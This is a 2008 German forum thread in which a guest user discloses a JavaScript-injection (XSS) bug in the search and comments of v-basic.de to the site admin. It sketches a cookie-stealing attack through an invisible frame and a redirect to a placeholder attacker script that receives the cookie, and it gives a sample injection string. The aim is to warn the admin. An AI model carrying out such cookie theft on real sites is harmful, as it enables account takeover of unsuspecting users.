JavaScript Injection
|
|
Seite: 1 |
| Autor |
|
|
TheFlame" |
 JavaScript Injection - Beitrag verfasst:
06.01.2008, 1:31 Uhr |
  |
[ Gastposter ]
|
Hallo!
Mögliches Szenario:
1.Angreifer entdeckt auf v-basic.de Bug der JavaScript Injection ermöglicht
2.Kleine HTML Seite mit unsichtbarem Frame der die entsprechende Seite öffnet wird erstellt und auf funpic oder so hochgeladen
3.javascript code wird injectet, frame öffnet die seite mit code der das cookie der seite ausliest. 4. inhalt wird in javascript variable gelegt und user wird per weiterleitung auf http://www.seitedesangreifers.de/accklauer.php?inhaltdescookies=(inhalt) weitergeleitet.
5. accklauer.php übergibt den inhalt irgendwie an den angreifer
6. nachdem all diese vorkehrungen vom angreifer gemacht wurden, postet der angreifer hier im forum den link.
7. user klicken drauf und SPLASH. account ist weg 
Die entsprechende Seite ist die Suchfunktion auf v-basic.de . Beispiel für Suchbegriff:
| Code: | 1 |
visualbasic"<br><br><br><br><br><br><br>
|
|
Beste Grüße
TheFlame
|
| |
 |
Nach Oben  |
|
|
TheFlame"<br> |
Ergänzung - Beitrag verfasst:
06.01.2008, 1:36 Uhr |
|
[ Gastposter ]
|
http://www.v-basic.de/index.php?page=newseintrag&id=29
Leider auch bei Kommentaren möglich.
@Admin: Nicht böse gemeint, soll ja nur vorbeugen das mal jemand sowas ausnutzt :/
|
| |
|
Nach Oben |
|
| Information |
| Wo bin ich? |
|
Programming Community » PROCO Intern » PROCO Interaktiv » JavaScript Injection |
| Rechte |
|
Du darfst:
Beiträge lesen,
Themen eröffnen,
auf Beiträge antworten und hier
keine Umfragen erstellen |
| Statistik |
|
Seit dem 31.07.2002 (3476 Tage) wurden 7013 Beiträge in 1977 Themen verfasst. |
|
Wir haben 1278 User und begrüßen unser neustes Mitglied:
g.schief
|
Rekord: 8 registrierte waren gleichzeitig hier (27.07.2006, 14:54 Uhr).
Im Moment: 0 registrierte Benutzer und 1 Gast online!
|
|
RSS-ABO
